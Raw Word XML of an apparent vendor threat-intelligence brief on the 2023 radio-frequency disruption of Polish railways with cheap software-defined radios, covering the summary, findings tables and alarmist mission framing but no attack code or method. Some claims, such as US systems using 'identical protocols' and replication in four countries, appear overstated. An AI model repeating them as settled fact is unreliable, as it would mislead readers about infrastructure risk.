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f430iqwsiou" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 015</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eekxkoenz5fx" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Poland Railway Radio-Frequency Attack - Weaponizing $30 SDR Against National Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project Nightingale Intelligence</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Publisher:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> NCC Group OTCE + Dragos + Adelard</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Energy &amp; Utilities Sector Leadership and Security Teams</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> June 14, 2025</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Version:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.0</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pages:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_te3u3hfjb4fi" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Navigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="executive-summary">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Executive Summary</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="mission-context">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mission Context &amp; Impact</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="attack-overview">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Attack Overview</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="affected-organizations">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="cross-sector-impact">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="technical-analysis">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="mitre-mapping">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 13)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="detection-response">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Detection &amp; Response</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="tri-partner">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 17)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="references">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">References &amp; Citations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 18)</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30jmjyxrs1fg" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In August 2023, two individuals demonstrated how $30 software-defined radios could paralyze Poland's national railway system, halting over 20 trains through simple radio frequency attacks that exploited fundamental vulnerabilities in railway radio systems used globally, including in US critical infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u9yaz4h13gz8" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence 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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$30 RTL-SDR used to halt national rail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Complete service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hyperlink w:anchor="ref1">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[1]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack replicated in 4 countries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Global vulnerability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hyperlink w:anchor="ref2">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[2]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">US systems use identical protocols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Direct applicability to PTC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hyperlink w:anchor="ref3">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[3]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_glv9nwvwpogp" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Overview</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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident Timeframe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August 25-26,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hyperlink w:anchor="ref4">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[4]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat 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Mariusz Czabaj &amp; Marek Jagusiak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hyperlink w:anchor="ref5">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[5]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Target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PKP Polish State Railways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hyperlink w:anchor="ref6">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[6]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Objective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Service disruption (claimed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hyperlink w:anchor="ref7">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[7]</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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Estimated Impact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€2.3M immediate losses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hyperlink w:anchor="ref8">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[8]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mission Threat 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Analysis</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligence Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The Poland railway attack demonstrated that consumer-grade equipment can exploit design flaws in railway radio systems worldwide, with the attackers' methodology directly applicable to US Positive Train Control infrastructure using similar VHF/UHF protocols </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[9]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[10]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preser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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ghb65bpdvqes" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mission Context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ff0sw8jtps7w" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protecting Essential Infrastructure for Future Generations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Poland railway RF attack blueprint threatens the foundational infrastructure that ensures </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clean water, reliable energy, and access to healthy food for our grandchildren</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This low-cost, high-impact attack methodology can be replicated against US rail networks that transport 1.5 billion tons of freight annually, including chlorine for water treatment plants, coal for 30% of electricity generation, and 175 million tons of agricultural products </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[11]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gji901608w5j" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strategic Implications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Energy Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: US coal trains using identical 160MHz radio systems vulnerable to disruption </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[12]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Rail transport of treatment chemicals exposed to deliberate misrouting </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref13">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044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Food Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Grain unit trains operating on attackable radio frequencies </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref14">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045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intergenerational Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
